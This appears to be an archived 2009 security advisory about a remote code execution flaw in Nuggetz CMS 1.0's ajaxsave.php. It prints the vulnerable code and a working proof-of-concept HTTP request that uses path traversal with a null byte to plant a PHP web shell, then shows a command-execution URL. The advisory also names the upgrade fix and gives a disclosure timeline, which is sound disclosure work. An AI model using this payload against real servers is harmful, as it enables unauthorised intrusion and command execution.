Nuggetz CMS 1.0 Code Execution

Nuggetz CMS 1.0 Code Execution: Posted Dec 10, 2009; Authored by Amol Naik; Nuggetz CMS version 1.0 suffers from a remote code execution vulnerability.; tags | exploit, remote, code execution; SHA-256 | 310b44cbfe418b0343922a14821545b165d5feb28615ca8605c5e3bdbfd392ed; Download | Favorite | View

Nuggetz CMS 1.0 Code Execution

#######################################################################
  Remote Code Execution in Nuggetz CMS 1.0

  Name      Remote Code Execution in Nuggetz CMS
  Systems Affected  Nuggetz CMS 1.0
  site      http://www.nuggetz.co.uk/
  Author      Amol Naik (amolnaik4[at]gmail.com)
  Date      10/12/2009
#######################################################################


############
 OVERVIEW
############

Nuggetz CMS 1.0 is vulnerable to Remote Code Execution.

######################
 Technical Details
######################

Vulnerable file: ajaxsave.php
Vulnerable Code:

<?php
  $save = str_replace('\"','"',$_POST['pagevalue']);

  $nugget = $_GET['nugget'];

  $fhandle = fopen("../data/$nugget.nuggetz",'w');
  // Write some data
  fwrite($fhandle,$save);
  fclose($fhandle);
  print $save;
?>

This file is used to save any changes done in nugget. The parameter 'nugget' is used to call the file 
for ex. support.nugget, which is at /web_dir/data/. The changed values are written back to the respective 
nugget. The parameters 'pagevalue' and 'nugget' are not properly sanitized. It is possible to create/edit 
files in the web server which leads to creating a new file with php command shell (RCE).

######
 PoC
######

The following request creates shell.php at /nuggetz/

POST /nuggetz/nuggetz/admin/ajaxsave.php?nugget=../../shell.php%00 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Cookie: PHPSESSID=4m2iiqdt0q38cna2iemtfel7p3
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

pagevalue=<?php passthru($_GET['cmd']); ?>


Shell Access:
http://localhost/nuggetz/shell.php?cmd=dir

#############
 WorkAround
#############

Upgrade to Nuggetz 1.0.1
Download:
http://www.nuggetz.co.uk/nuggetz_v1.0.1.zip


############
 Reference
############

http://www.nuggetz.co.uk/versionhistory.htm


############
 TimeLine
############

Bug discovered       : 09/12/2009
Informed Vendor      : 10/12/2009 
Vendor released new version  : 10/12/2009
Public Disclosure    : 10/12/2009

Top Authors In Last 30 Days

Red Hat 194 files
Ubuntu 67 files
Debian 24 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
malvuln 4 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,011)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,194)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,473)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,437)
UNIX (9,390)
UnixWare (187)
Windows (6,649)
Other

Nuggetz CMS 1.0 Code Execution

Nuggetz CMS 1.0 Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Nuggetz CMS 1.0 Code Execution

Share This

Nuggetz CMS 1.0 Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems